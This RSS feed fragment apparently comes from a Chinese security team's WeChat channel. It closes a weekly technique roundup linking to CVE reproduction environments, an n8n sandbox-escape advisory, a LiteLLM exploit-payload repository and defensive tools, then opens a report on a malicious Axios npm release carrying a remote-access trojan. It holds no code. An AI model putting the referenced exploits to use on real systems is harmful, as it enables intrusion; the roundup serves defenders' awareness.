break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-24061：telnetd漏洞复现环境</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/vulhub/vulhub/tree/master/inetutils/CVE-2026-24061" target="_blank">https://github.com/vulhub/vulhub/tree/master/inetutils/CVE-2026-24061</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-0863：n8n Python沙箱逃逸漏洞逃逸执行代码</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://research.jfrog.com/vulnerabilities/n8n-python-runner-sandbox-escape-jfsa-2026-001651077" target="_blank">https://research.jfrog.com/vulnerabilities/n8n-python-runner-sandbox-escape-jfsa-2026-001651077</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">litellm_1.82.8_payload：LiteLLM v1.82.8版本漏洞利用载荷</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/HackingLZ/litellm_1.82.8_payload" target="_blank">https://github.com/HackingLZ/litellm_1.82.8_payload</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">人工智能和安全</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">SuperClaude：采用Grok-based transformer模型进行内容推荐</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/SuperClaude-Org/SuperClaude_Framework" target="_blank">https://github.com/SuperClaude-Org/SuperClaude_Framework</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">ai-best-practices：部署Semgrep AI规则集进行自动化代码安全检测</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/semgrep/ai-best-practices" target="_blank">https://github.com/semgrep/ai-best-practices</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">NemoClaw：AI驱动网络安全代理框架，用于自动化检测与响应</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/NVIDIA/NemoClaw" target="_blank">https://github.com/NVIDIA/NemoClaw</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">SpecterOps介绍使用Claude Code进行安全代码审查，包括&#34;教育模式&#34;提示词技巧</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://specterops.io/blog/2026/03/26/leveling-up-secure-code-reviews-with-claude-code/" target="_blank">https://specterops.io/blog/2026/03/26/leveling-up-secure-code-reviews-with-claude-code/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">heretic：AI辅助安全工具，用于威胁检测与响应分析</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/p-e-w/heretic" target="_blank">https://github.com/p-e-w/heretic</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">其他</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">awesome-deception：收集欺骗技术相关资源</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/tracebit-com/awesome-deception" target="_blank">https://github.com/tracebit-com/awesome-deception</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">InfraGuard：C2重定向代理工具，蓝队可监控C2通信异常</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/Whispergate/InfraGuard" target="_blank">https://github.com/Whispergate/InfraGuard</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CredSweeper：凭证扫描工具，检测代码库敏感凭证泄露</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/Samsung/CredSweeper" target="_blank">https://github.com/Samsung/CredSweeper</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">portless：端口管理和网络监控工具</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/vercel-labs/portless" target="_blank">https://github.com/vercel-labs/portless</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Qualys报告显示，过去四年关键漏洞修复速度落后于攻击者利用速度，手动修复流程存在缺陷</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.qualys.com/category/vulnerabilities-threat-research" target="_blank">https://blog.qualys.com/category/vulnerabilities-threat-research</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011265" src="https://wechat2rss.xlab.app/img-proxy/?k=9e00f48f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCk338UdNIOib5sibu6d9EuU4QH2gS2BwQyx2F8R1GiazSe0LnegBrtjd2F5xByTicbI1PjwKDSp3Mdsm66mfYeHCiaYfdooSlgzkDxw%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9145907" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011266" src="https://wechat2rss.xlab.app/img-proxy/?k=6bee4565&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCmtOkBWaNXWDxQmhsFjdxyNrNWxYJwUeial8PQ0eh1iaRsibVSlqLWZp0Tg2rBiaydBYoK2kmBd7DDLAfEQ0rhk1GszMNNLodV5MGc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div><div style="margin: 10px 0% 0px;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 10px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 17px;padding: 0px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">往期推荐</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494891&amp;idx=2&amp;sn=9fea43e1c6cc95791e2f62f236fdb987&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.3.21-2026.3.27）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.3.21-2026.3.27）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494762&amp;idx=1&amp;sn=ca8490675064f1b8b18de2a02a4134b5&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.3.14-2026.3.20）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.3.14-2026.3.20）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494751&amp;idx=1&amp;sn=06f539727afaa65f36aa707fce4d3d8a&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.3.7-2026.3.13）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.3.7-2026.3.13）</a></span></p></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=fe53d0ca&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494916%26idx%3D1%26sn%3Db01106658b570c0d850fb0a21ccbb036">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 03 Apr 2026 18:02:00 +0800</pubDate>
    </item>
    <item>
      <title>OpenClaw依赖包Axios遭供应链投毒：恶意版本植入远控木马</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494899&amp;idx=1&amp;sn=0030596542ccc940303101d3f850e2a6</link>
      <description>2026 年 3 月 31 日，npm 生态遭遇重大供应链攻击。流行 HTTP 客户端库 Axios 的维护者账户被劫持，攻击者发布两个恶意版本（1.14.1 和 0.30.4），植入远程访问木马（RAT）。</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-03-31 18:00</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=47c0366c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jCnTh0P0tTaku1MLvSEVJqhx7KUrgorkVqu3F46AZ20Cich1NWIM6iaMQ2lk13LdN6zz6aIgpYywE6oylTFg7B68f7G5BcCXwQCGU%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026 年 3 月 31 日，npm 生态遭遇重大供应链攻击。流行 HTTP 客户端库 Axios 的维护者账户被劫持，攻击者发布两个恶意版本（1.14.1 和 0.30.4），植入远程访问木马（RAT）。</p>
  <blockquote style="margin: 0px;padding: 0.5em 1em;outline: 0px;border-left: 3px solid rgb(72, 112, 172);color: rgb(64, 70, 79);font-size: 14.4px;text-indent: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;display: block;background: rgb(246, 248, 250);line-height: 1.75;visibility: visible;"><p mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 1em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;font-size: 14.4px;line-height: 1.75;visibility: visible;"><strong mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 14.4px;line-height: 1.75;visibility: visible;"><span leaf="">核心摘要：</span></strong><span leaf="">2026 年 3 月 31 日，npm 生态遭遇重大供应链攻击。流行 HTTP 客户端库 Axios 的维护者账户被劫持，攻击者发布两个恶意版本（1.14.1 和 0.30.4），植入远程访问木马（RAT）。</span><strong mp-original-font-size="14.4" mp-original-line-height="1.7500000694444444" style="margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(72, 112, 172);font-size: 14.4px;line-height: 1.75;visibility: visible;"><span leaf="">OpenClaw 及其插件生态依赖 Axios</span></strong><span leaf="">，用户需立即检查并降级至安全版本。</span></p></blockquote><hr style="margin: 20px 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family: system-ui, &#34;Apple Color Emoji&#34;, &#34;Segoe UI&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Sans&#34;, Roboto, sans-serif;font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;text-decoration-thickness: auto;text-decoration-style: solid;border-width: 2px 0px 